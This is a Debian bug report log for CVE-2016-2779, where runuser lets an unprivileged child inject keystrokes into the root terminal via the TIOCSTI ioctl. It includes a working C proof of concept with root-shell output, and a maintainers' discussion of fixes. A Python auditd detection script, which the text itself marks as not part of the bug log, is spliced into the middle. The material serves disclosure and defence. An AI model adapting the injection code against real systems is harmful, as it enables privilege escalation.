util-linux: CVE-2016-2779: runuser tty hijacking via TIOCSTI ioctl

Related Vulnerabilities: CVE-2016-2779   CVE-2016-2568  

Debian Bug report logs - #815922


Reported by: up201407890@alunos.dcc.fc.up.pt

Date: Thu, 25 Feb 2016 18:54:02 UTC

Severity: important

Tags: security, upstream

Found in version util-linux/2.24.2-1

Fixed in version 2.31.1-0.1

Done: Chris Hofstaedtler <zeha@debian.org>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Thu, 25 Feb 2016 18:54:06 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
New Bug report received and forwarded. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Thu, 25 Feb 2016 18:54:06 GMT)


Message #5 received at submit@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: submit@bugs.debian.org
Subject: runuser tty hijacking via TIOCSTI ioctl
Date: Thu, 25 Feb 2016 19:51:23 +0100
Package: util-linux
Version: all
Severity: important


When executing a program via "runuser -u nonpriv program" the nonpriv session can
escape to the parent session by using the TIOCSTI ioctl to push characters into the
terminal's input buffer, allowing privilege escalation.
This issue has been fixed in "su" by calling setsid() and in "sudo" by using the
"use_pty" flag.

# cat test.c
#include <sys/ioctl.h>

int main()
{
  char *cmd = "id\n";
  while(*cmd)
   ioctl(0, TIOCSTI, cmd++);
}

# gcc test.c -o test
# id saken
uid=1000(saken) gid=1000(saken) groups=1000(saken)

# runuser -u saken ./test ---> last command i type in
id
# id ---> did not type this
uid=0(root) gid=0(root) groups=0(root)


Thanks,
Federico Bento

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.





Information forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Fri, 26 Feb 2016 15:18:17 GMT)


Acknowledgement sent to Phil Susi <psusi@ubuntu.com>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Fri, 26 Feb 2016 15:18:17 GMT)


Message #10 received at 815922@bugs.debian.org:

From: Phil Susi <psusi@ubuntu.com>
To: up201407890@alunos.dcc.fc.up.pt, 815922@bugs.debian.org
Subject: Re: Bug#815922: runuser tty hijacking via TIOCSTI ioctl
Date: Fri, 26 Feb 2016 10:04:49 -0500
On 2/25/2016 1:51 PM, up201407890@alunos.dcc.fc.up.pt wrote:
> When executing a program via "runuser -u nonpriv program" the
> nonpriv session can
> escape to the parent session by using the TIOCSTI ioctl to push
> characters into the
> terminal's input buffer, allowing privilege escalation.
> This issue has been fixed in "su" by calling setsid() and in "sudo" by
> using the "use_pty" flag

How does setsid() help this?  And wouldn't it break the ability to use
ctrl-c and ctrl-z on the child program ( since the child won't have a
controlling terminal )?  I would think the fix would be to simply flush
the terminal input buffer after the child exits.



No longer marked as found in versions all. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 27 Feb 2016 06:51:09 GMT)


Added tag(s) security. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 27 Feb 2016 06:51:14 GMT)


Marked as found in versions util-linux/2.24.2-1. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 27 Feb 2016 07:03:03 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Sat, 27 Feb 2016 09:57:03 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Sat, 27 Feb 2016 09:57:03 GMT)


Message #21 received at 815922@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: "Phil Susi" <psusi@ubuntu.com>
Cc: 815922@bugs.debian.org
Subject: Re: Bug#815922: runuser tty hijacking via TIOCSTI ioctl
Date: Sat, 27 Feb 2016 10:23:37 +0100
Quoting "Phil Susi" <psusi@ubuntu.com>:

> How does setsid() help this?  And wouldn't it break the ability to use
> ctrl-c and ctrl-z on the child program ( since the child won't have a
> controlling terminal )?  I would think the fix would be to simply flush
> the terminal input buffer after the child exits.
>

Hello Phil,

Most of your questions are answered here:
https://bugzilla.redhat.com/show_bug.cgi?id=173008

And yes, there would be no job control if you started a shell from
there. This is why in "su" setsid() is called only with "-c",
partially fixing the issue. If one were to "su - user" it would still
be vulnerable.

http://www.openwall.com/lists/oss-security/2016/02/25/6

The same pkexec issue got assigned CVE-2016-2568 yesterday, if you
read my PS: "I don't believe any of the previous mentions of fixes for
"su" and "sudo" would work here, since executing a shell via pkexec
would make it not have job control."






Added tag(s) upstream. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 27 Feb 2016 16:18:13 GMT)


Changed Bug title to 'util-linux: CVE-2016-2779: runuser tty hijacking via TIOCSTI ioctl' from 'runuser tty hijacking via TIOCSTI ioctl'. Request was from Salvatore Bonaccorso <carnil@debian.org> to control@bugs.debian.org. (Sat, 27 Feb 2016 16:18:14 GMT)


Information forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Mon, 29 Feb 2016 14:51:14 GMT)


Acknowledgement sent to Phil Susi <psusi@ubuntu.com>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Mon, 29 Feb 2016 14:51:14 GMT)


Message #30 received at 815922@bugs.debian.org:

From: Phil Susi <psusi@ubuntu.com>
To: up201407890@alunos.dcc.fc.up.pt
Cc: 815922@bugs.debian.org
Subject: Re: Bug#815922: runuser tty hijacking via TIOCSTI ioctl
Date: Mon, 29 Feb 2016 09:47:04 -0500
On 2/27/2016 4:23 AM, up201407890@alunos.dcc.fc.up.pt wrote:
> And yes, there would be no job control if you started a shell from
> there. This is why in "su" setsid() is called only with "-c", partially
> fixing the issue. If one would to "su - user" it would still be vulnerable.

That isn't good.  Shouldn't only the foreground process group be allowed
to use this ioctl, thus preventing any background forked processes from
exploiting this?




Information forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Mon, 29 Feb 2016 18:33:07 GMT)


Acknowledgement sent to up201407890@alunos.dcc.fc.up.pt:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Mon, 29 Feb 2016 18:33:07 GMT)


Message #35 received at 815922@bugs.debian.org:

From: up201407890@alunos.dcc.fc.up.pt
To: "Phil Susi" <psusi@ubuntu.com>
Cc: 815922@bugs.debian.org
Subject: Re: Bug#815922: runuser tty hijacking via TIOCSTI ioctl
Date: Mon, 29 Feb 2016 19:29:50 +0100
Quoting "Phil Susi" <psusi@ubuntu.com>:

> On 2/27/2016 4:23 AM, up201407890@alunos.dcc.fc.up.pt wrote:
>> And yes, there would be no job control if you started a shell from
>> there. This is why in "su" setsid() is called only with "-c", partially
>> fixing the issue. If one would to "su - user" it would still be vulnerable.
>
> That isn't good.  Shouldn't only the foreground process group be allowed
> to use this ioctl, thus preventing any background forked processes from
> exploiting this?

I believe that is up to kernel developers.
grsecurity released a new feature named GRKERNSEC_HARDEN_TTY on Feb 18
that disallows the use of TIOCSTI to unprivileged users, unless they
have the CAP_SYS_ADMIN capability, mitigating these issues.

He said looking into it, he didn't find any legitimate uses of such ioctl.

Check out gr_handle_tiocsti()

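An added detection example, not part of the bug log: it parses auditd SYSCALL records for successful TIOCSTI ioctl calls and reports which process pushed how many bytes into which tty, which is the pattern the grsecurity restriction above blocks. It assumes an audit rule along the lines of `-a always,exit -F arch=b64 -S ioctl -F a1=0x5412 -k tiocsti` (0x5412 is TIOCSTI on x86; the rule itself is an assumption, not from the page), and the log lines are constructed and abbreviated.

```python
import re
from collections import Counter

TIOCSTI = 0x5412        # ioctl request number from <asm-generic/ioctls.h>
SYS_IOCTL_X86_64 = 16   # ioctl(2) syscall number on x86_64 (audit arch=c000003e)

# Constructed, abbreviated auditd SYSCALL records mirroring the report's
# scenario: a root shell runs "runuser -u saken ./test" and the child
# (pid 2101, euid 1000) pushes "id\n" into pts0 one byte per TIOCSTI call.
# The last record is an ordinary TCGETS (0x5401) by the root shell and
# must not be flagged.
SAMPLE_AUDIT_LOG = """\
type=SYSCALL msg=audit(1456426283.101:501): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5412 a2=55d0c3a02004 a3=0 ppid=2100 pid=2101 auid=0 uid=1000 euid=1000 tty=pts0 ses=2 comm="test" exe="/root/test" key="tiocsti"
type=SYSCALL msg=audit(1456426283.102:502): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5412 a2=55d0c3a02005 a3=0 ppid=2100 pid=2101 auid=0 uid=1000 euid=1000 tty=pts0 ses=2 comm="test" exe="/root/test" key="tiocsti"
type=SYSCALL msg=audit(1456426283.103:503): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5412 a2=55d0c3a02006 a3=0 ppid=2100 pid=2101 auid=0 uid=1000 euid=1000 tty=pts0 ses=2 comm="test" exe="/root/test" key="tiocsti"
type=SYSCALL msg=audit(1456426283.900:504): arch=c000003e syscall=16 success=yes exit=0 a0=0 a1=5401 a2=7ffd2f1e3c40 a3=0 ppid=1 pid=2100 auid=0 uid=0 euid=0 tty=pts0 ses=2 comm="bash" exe="/bin/bash" key="tiocsti"
"""

FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_record(line):
    """Split one auditd record into a dict of field -> value (quotes stripped)."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def is_tiocsti(rec):
    """True when the record is a successful ioctl(fd, TIOCSTI, ...) on x86_64."""
    if rec.get("type") != "SYSCALL" or rec.get("arch") != "c000003e":
        return False
    try:  # audit prints syscall arguments as bare hex, so parse a1 with base 16
        return (int(rec["syscall"]) == SYS_IOCTL_X86_64
                and int(rec["a1"], 16) == TIOCSTI
                and rec.get("success") == "yes")
    except (KeyError, ValueError):
        return False

def find_tiocsti_injection(log_text):
    """Count TIOCSTI calls per (tty, pid, euid, comm).  Each hit is one byte
    pushed into that terminal's input queue, so the count approximates the
    length of the injected command."""
    hits = Counter()
    for line in log_text.splitlines():
        rec = parse_record(line)
        if is_tiocsti(rec):
            hits[(rec.get("tty"), rec.get("pid"), rec.get("euid"), rec.get("comm"))] += 1
    return hits

def unprivileged_hits(hits):
    """Keep only injections made with a non-root effective uid: an unprivileged
    process writing into a tty a privileged shell reads is the CVE-2016-2779 pattern."""
    return {key: n for key, n in hits.items() if key[2] != "0"}

if __name__ == "__main__":
    for (tty, pid, euid, comm), n in unprivileged_hits(find_tiocsti_injection(SAMPLE_AUDIT_LOG)).items():
        print(f"{comm} (pid {pid}, euid {euid}) pushed {n} byte(s) into {tty} via TIOCSTI")
```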





Information forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Tue, 01 Mar 2016 13:36:11 GMT)


Acknowledgement sent to Phil Susi <psusi@ubuntu.com>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Tue, 01 Mar 2016 13:36:11 GMT)


Message #40 received at 815922@bugs.debian.org:

From: Phil Susi <psusi@ubuntu.com>
To: up201407890@alunos.dcc.fc.up.pt
Cc: 815922@bugs.debian.org
Subject: Re: Bug#815922: runuser tty hijacking via TIOCSTI ioctl
Date: Tue, 1 Mar 2016 08:35:07 -0500
On 2/29/2016 1:29 PM, up201407890@alunos.dcc.fc.up.pt wrote:
> He said looking into it, he didn't find any legitimate uses of such ioctl.

That was the other thing I was wondering about: why would such a silly
and security problematic ioctl exist in the first place?  I guess that
answers it, and removing or restricting it means we don't break job
control.  That sounds like the proper fix instead of using setsid().




Information forwarded to debian-bugs-dist@lists.debian.org, Debian util-linux Maintainers <ah-util-linux@debian.org>:
Bug#815922; Package util-linux. (Thu, 03 Mar 2016 14:18:03 GMT)


Acknowledgement sent to Stanislav Brabec <sbrabec@suse.cz>:
Extra info received and forwarded to list. Copy sent to Debian util-linux Maintainers <ah-util-linux@debian.org>. (Thu, 03 Mar 2016 14:18:03 GMT)


Message #45 received at 815922@bugs.debian.org:

From: Stanislav Brabec <sbrabec@suse.cz>
To: 815922@bugs.debian.org
Subject: Re: runuser tty hijacking via TIOCSTI ioctl
Date: Thu, 3 Mar 2016 14:58:49 +0100
I just opened a discussion on the upstream util-linux list:
http://marc.info/?t=145694748900001&r=1&w=2

Discussion there proposes to fix it in the kernel:

Disallow the use of TIOCSTI to unprivileged users unless the caller has 
CAP_SYS_ADMIN.

-- 
Best Regards / S pozdravem,

Stanislav Brabec
software developer



Reply sent to Chris Hofstaedtler <zeha@debian.org>:
You have taken responsibility. (Wed, 08 Aug 2018 18:51:06 GMT)


Notification sent to up201407890@alunos.dcc.fc.up.pt:
Bug acknowledged by developer. (Wed, 08 Aug 2018 18:51:06 GMT)


Message #50 received at 815922-done@bugs.debian.org:

From: Chris Hofstaedtler <zeha@debian.org>
To: up201407890@alunos.dcc.fc.up.pt, 815922-done@bugs.debian.org
Subject: Re: Bug#815922: runuser tty hijacking via TIOCSTI ioctl
Date: Wed, 8 Aug 2018 20:46:48 +0200
Version: 2.31.1-0.1

Upstream had this to say for the 2.31.0 release:

 CVE-2016-2779 

 The new experimental "su --pty" feature has been implemented to fix this issue.
 The feature is not enabled by default and the new command line option --pty is
 necessary.

 The classic way is to use setsid() to disable the ioctl TIOCSTI. Unfortunately,
 setsid() has well-defined use cases in su(1) and runuser(1) and any changes 
 would introduce regressions. The setsid() also does not fix core of the problem 
 that is terminal file descriptors shared between privileged and unprivileged
 sessions.


Note:

 runuser uses the su-common code, and also got the --pty flag.




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Thu, 06 Sep 2018 07:26:00 GMT)




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 15:04:49 2019; Machine Name: buxtehude
